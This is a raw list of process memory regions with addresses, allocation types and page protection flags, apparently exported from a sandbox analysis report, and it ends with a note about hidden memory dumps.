53E000
stack
page read and write
3A5D000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
41A000
heap
page read and write
3250000
trusted library allocation
page read and write
3C3000
trusted library allocation
page read and write
4A9000
heap
page read and write
2B38000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
10000000
unkown
page readonly
76B0000
trusted library allocation
page read and write
3B0000
heap
page read and write
1F00000
trusted library allocation
page read and write
2A75000
trusted library allocation
page read and write
10000
heap
page read and write
2A43000
trusted library allocation
page read and write
91F000
stack
page read and write
445000
heap
page read and write
3AF0000
trusted library allocation
page read and write
3BF000
heap
page read and write
265000
heap
page read and write
2417000
trusted library allocation
page read and write
350000
heap
page read and write
7DA000
heap
page read and write
3153000
trusted library allocation
page read and write
30AC000
heap
page read and write
7E5000
heap
page read and write
4968000
heap
page read and write
428000
heap
page read and write
1F00000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
3F0000
heap
page read and write
30B5000
heap
page read and write
2B38000
trusted library allocation
page read and write
3C4000
trusted library allocation
page read and write
2A75000
trusted library allocation
page read and write
4B1000
heap
page read and write
950000
heap
page read and write
2E30000
trusted library allocation
page read and write
2EF2000
trusted library allocation
page read and write
2860000
trusted library allocation
page read and write
3143000
trusted library allocation
page read and write
23D4000
trusted library allocation
page read and write
7FF00260000
trusted library allocation
page execute and read and write
A90000
heap
page read and write
30AE000
heap
page read and write
943000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
3A1B000
trusted library allocation
page read and write
2F48000
trusted library allocation
page read and write
2430000
heap
page read and write
351B000
stack
page read and write
2C50000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
241E000
stack
page read and write
74BD000
heap
page read and write
2C4B000
trusted library allocation
page read and write
3514000
trusted library allocation
page read and write
90EE000
trusted library allocation
page read and write
484000
heap
page read and write
7FF00230000
trusted library allocation
page execute and read and write
3250000
trusted library allocation
page read and write
3ADA000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
29F0000
trusted library allocation
page read and write
250000
heap
page read and write
300D000
heap
page read and write
2ADD000
trusted library allocation
page read and write
2860000
trusted library allocation
page read and write
7FF001E0000
trusted library allocation
page execute and read and write
D50000
heap
page read and write
30C2000
heap
page read and write
8E6E000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
30C0000
trusted library allocation
page read and write
10057000
unkown
page read and write
1F00000
trusted library allocation
page read and write
28EE000
stack
page read and write
285C000
stack
page read and write
2B28000
trusted library allocation
page read and write
30C2000
heap
page read and write
467000
heap
page read and write
1C56000
heap
page read and write
2A75000
trusted library allocation
page read and write
3B3000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
2480000
heap
page read and write
302E000
stack
page read and write
2A4D000
trusted library allocation
page read and write
7FF00190000
trusted library allocation
page read and write
334A000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
1E7000
heap
page read and write
23D4000
trusted library allocation
page read and write
8EFE000
trusted library allocation
page read and write
3144000
trusted library allocation
page read and write
7DD000
heap
page read and write
4968000
heap
page read and write
3530000
trusted library allocation
page read and write
91AE000
trusted library allocation
page read and write
25E0000
trusted library section
page readonly
3A5D000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
1B810000
heap
page read and write
2A4D000
trusted library allocation
page read and write
2F8E000
stack
page read and write
30B5000
heap
page read and write
2F4C000
trusted library allocation
page read and write
2FAE000
stack
page read and write
30B5000
heap
page read and write
7698000
trusted library allocation
page read and write
3DA000
heap
page read and write
2E3E000
trusted library allocation
page read and write
2330000
trusted library allocation
page read and write
30A8000
heap
page read and write
23D4000
trusted library allocation
page read and write
7FF00280000
trusted library allocation
page execute and read and write
A4D000
stack
page read and write
25E9000
trusted library section
page readonly
7698000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
436000
heap
page read and write
2ADD000
trusted library allocation
page read and write
3716000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
83EE000
trusted library allocation
page read and write
2E81000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
3095000
heap
page read and write
1F00000
trusted library allocation
page read and write
2B20000
trusted library allocation
page read and write
51F000
stack
page read and write
30000
heap
page read and write
2A57000
trusted library allocation
page read and write
3BC000
heap
page read and write
23F8000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
8DE000
stack
page read and write
740000
heap
page read and write
2DE0000
trusted library allocation
page read and write
3027000
heap
page read and write
28B0000
trusted library allocation
page read and write
279000
heap
page read and write
1B430000
remote allocation
page read and write
2417000
trusted library allocation
page read and write
3A1B000
trusted library allocation
page read and write
3AE2000
trusted library allocation
page read and write
4950000
heap
page read and write
445000
heap
page read and write
2F1F000
trusted library allocation
page read and write
2A4D000
trusted library allocation
page read and write
332E000
unkown
page read and write
2FF8000
heap
page read and write
2F37000
trusted library allocation
page read and write
23D4000
trusted library allocation
page read and write
410000
heap
page read and write
30CD000
trusted library allocation
page read and write
1B430000
remote allocation
page read and write
31B0000
trusted library allocation
page read and write
43D000
heap
page read and write
E86E000
trusted library allocation
page read and write
495F000
heap
page read and write
2417000
trusted library allocation
page read and write
3E4000
heap
page read and write
2303000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
3099000
heap
page read and write
2414000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
2C04000
heap
page read and write
23C4000
trusted library allocation
page read and write
4A0000
heap
page read and write
3099000
heap
page read and write
274000
trusted library allocation
page read and write
3088000
heap
page read and write
2417000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
2A4D000
trusted library allocation
page read and write
3AB6000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
3A1B000
trusted library allocation
page read and write
845E000
trusted library allocation
page read and write
8EBE000
trusted library allocation
page read and write
4CD0000
heap
page read and write
7698000
trusted library allocation
page read and write
317A000
trusted library allocation
page read and write
43A000
heap
page read and write
30B1000
heap
page read and write
2A57000
trusted library allocation
page read and write
2540000
trusted library allocation
page read and write
3063000
heap
page read and write
30B3000
heap
page read and write
2ADD000
trusted library allocation
page read and write
2FF8000
heap
page read and write
23F8000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
458000
heap
page read and write
8C7E000
trusted library allocation
page read and write
300D000
heap
page read and write
818E000
trusted library allocation
page read and write
39C2000
trusted library allocation
page read and write
7475000
heap
page read and write
250000
trusted library allocation
page read and write
1D1000
stack
page read and write
1E7E000
stack
page read and write | page guard
25F000
heap
page read and write
414000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
78D000
heap
page read and write
3A1B000
trusted library allocation
page read and write
2C4D000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
443000
heap
page read and write
23F8000
trusted library allocation
page read and write
394000
trusted library allocation
page read and write
29EE000
stack
page read and write
30C4000
heap
page read and write
4B10000
trusted library allocation
page read and write
3AD8000
trusted library allocation
page read and write
2E5C000
trusted library allocation
page read and write
E86E000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
2260000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
3AE2000
trusted library allocation
page read and write
303E000
heap
page read and write
3A1B000
trusted library allocation
page read and write
2C4B000
trusted library allocation
page read and write
3AE2000
trusted library allocation
page read and write
30B6000
heap
page read and write
7FF000F0000
trusted library allocation
page read and write
2A65000
trusted library allocation
page read and write
2D20000
trusted library allocation
page read and write
31B0000
trusted library allocation
page read and write
3746000
trusted library allocation
page read and write
428000
heap
page read and write
2E54000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
10057000
unkown
page read and write
380000
heap
page read and write
31AE000
stack
page read and write
91AE000
trusted library allocation
page read and write
3046000
heap
page read and write
2414000
trusted library allocation
page read and write
2A10000
trusted library allocation
page read and write
30C2000
heap
page read and write
30DA000
heap
page read and write
23C4000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
1B844000
heap
page read and write
4F0000
heap
page read and write
3A1B000
trusted library allocation
page read and write
34FE000
trusted library allocation
page read and write
3095000
heap
page read and write
76B0000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
21E000
heap
page read and write
2600000
heap
page read and write
2E3E000
trusted library allocation
page read and write
30E0000
trusted library allocation
page read and write
3501000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
2C3000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
414000
heap
page read and write
2ADD000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
30A2000
heap
page read and write
414000
heap
page read and write
3A1B000
trusted library allocation
page read and write
12D21000
trusted library allocation
page read and write
1B8A5000
heap
page read and write
24C000
heap
page read and write
2A70000
heap
page read and write
1C0000
heap
page read and write
2FEA000
heap
page read and write
7FF000E0000
trusted library allocation
page read and write
E86E000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
20D0000
heap
page read and write
30D7000
heap
page read and write
156000
stack
page read and write
2D20000
trusted library allocation
page read and write
2A50000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
301D000
heap
page read and write
292F000
stack
page read and write
76A4000
trusted library allocation
page read and write
3073000
heap
page read and write
3001000
heap
page read and write
30AA000
heap
page read and write
91AE000
trusted library allocation
page read and write
2A49000
trusted library allocation
page read and write
30AC000
heap
page read and write
1005A000
unkown
page readonly
2414000
trusted library allocation
page read and write
10000000
unkown
page readonly
3A5D000
trusted library allocation
page read and write
271000
heap
page read and write
2E00000
trusted library allocation
page read and write
2E13000
unkown
page read and write
9B0000
heap
page read and write
23D4000
trusted library allocation
page read and write
1B8AD000
heap
page read and write
2A13000
trusted library allocation
page read and write
2E3E000
trusted library allocation
page read and write
3B4000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
7FF00022000
trusted library allocation
page execute and read and write
757000
heap
page read and write
2F2E000
trusted library allocation
page read and write
2A54000
trusted library allocation
page read and write
4C2000
heap
page read and write
76B0000
trusted library allocation
page read and write
302B000
heap
page read and write
3AE2000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
3AE2000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
2A57000
trusted library allocation
page read and write
3A1000
heap
page read and write
2414000
trusted library allocation
page read and write
2A57000
trusted library allocation
page read and write
2304000
trusted library allocation
page read and write
2A61000
trusted library allocation
page read and write
3FE000
stack
page read and write
3ABD000
trusted library allocation
page read and write
3097000
heap
page read and write
4BC000
heap
page read and write
3540000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
413000
trusted library allocation
page read and write
30BE000
stack
page read and write
12EC2000
trusted library allocation
page read and write
910E000
trusted library allocation
page read and write
2C4D000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
27C000
heap
page read and write
2E3E000
trusted library allocation
page read and write
734000
heap
page read and write
3AE2000
trusted library allocation
page read and write
2EDD000
trusted library allocation
page read and write
2A51000
trusted library allocation
page read and write
83EE000
trusted library allocation
page read and write
2FEA000
heap
page read and write
7FF001F0000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
30B3000
heap
page read and write
E86E000
trusted library allocation
page read and write
10046000
unkown
page readonly
303C000
heap
page read and write
C84000
trusted library allocation
page read and write
3507000
trusted library allocation
page read and write
3A1B000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
3ABF000
trusted library allocation
page read and write
31E3000
trusted library allocation
page execute
4B3000
heap
page read and write
3A1B000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
7FF00030000
trusted library allocation
page read and write
2B36000
trusted library allocation
page read and write
301E000
stack
page read and write
23D4000
trusted library allocation
page read and write
4B10000
trusted library allocation
page read and write
2F0000
trusted library allocation
page read and write
990000
trusted library allocation
page read and write
3A1B000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
3025000
heap
page read and write
4969000
heap
page read and write
1C7D0000
heap
page read and write
76A4000
trusted library allocation
page read and write
43D000
heap
page read and write
2A57000
trusted library allocation
page read and write
10053000
unkown
page read and write
30B3000
heap
page read and write
8FCE000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
3504000
trusted library allocation
page read and write
30000
heap
page read and write
30B1000
heap
page read and write
3120000
trusted library allocation
page read and write
10046000
unkown
page readonly
494C000
heap
page read and write
920000
trusted library allocation
page read and write
7FF001B0000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
2BAF000
stack
page read and write
76A4000
trusted library allocation
page read and write
1CBEE000
stack
page read and write
2F03000
trusted library allocation
page read and write
839E000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
30AC000
heap
page read and write
24C0000
heap
page read and write
2A75000
trusted library allocation
page read and write
30AA000
heap
page read and write
3AEF000
trusted library allocation
page read and write
3AEF000
trusted library allocation
page read and write
1BB10000
heap
page read and write
3AEF000
trusted library allocation
page read and write
3071000
heap
page read and write
43B000
heap
page read and write
2B3B000
trusted library allocation
page read and write
324F000
stack
page read and write
3A1B000
trusted library allocation
page read and write
30D1000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
F0000
heap
page read and write
AF0000
heap
page read and write
2CBD000
stack
page read and write
2EEE000
trusted library allocation
page read and write
3A1B000
trusted library allocation
page read and write
2605000
heap
page read and write
3AC1000
trusted library allocation
page read and write
2C4D000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
10000
heap
page read and write
3AE2000
trusted library allocation
page read and write
288F000
stack
page read and write
2A57000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
4A3000
heap
page read and write
30B1000
heap
page read and write
2A4D000
trusted library allocation
page read and write
908E000
trusted library allocation
page read and write
2AB0000
heap
page read and write
2FFF000
heap
page read and write
2414000
trusted library allocation
page read and write
B60000
trusted library allocation
page read and write
273000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
A88000
heap
page read and write
1CA80000
heap
page read and write
2417000
trusted library allocation
page read and write
27CD000
stack
page read and write
2FBE000
trusted library allocation
page read and write
794000
heap
page read and write
2A4E000
trusted library allocation
page read and write
2310000
heap
page read and write
3AD8000
trusted library allocation
page read and write
2BDA000
trusted library allocation
page read and write
29F0000
trusted library allocation
page read and write
30AC000
heap
page read and write
2E59000
trusted library allocation
page read and write
4CA000
heap
page read and write
76B0000
trusted library allocation
page read and write
910E000
trusted library allocation
page read and write
There are 1744 hidden memdumps, click here to show them.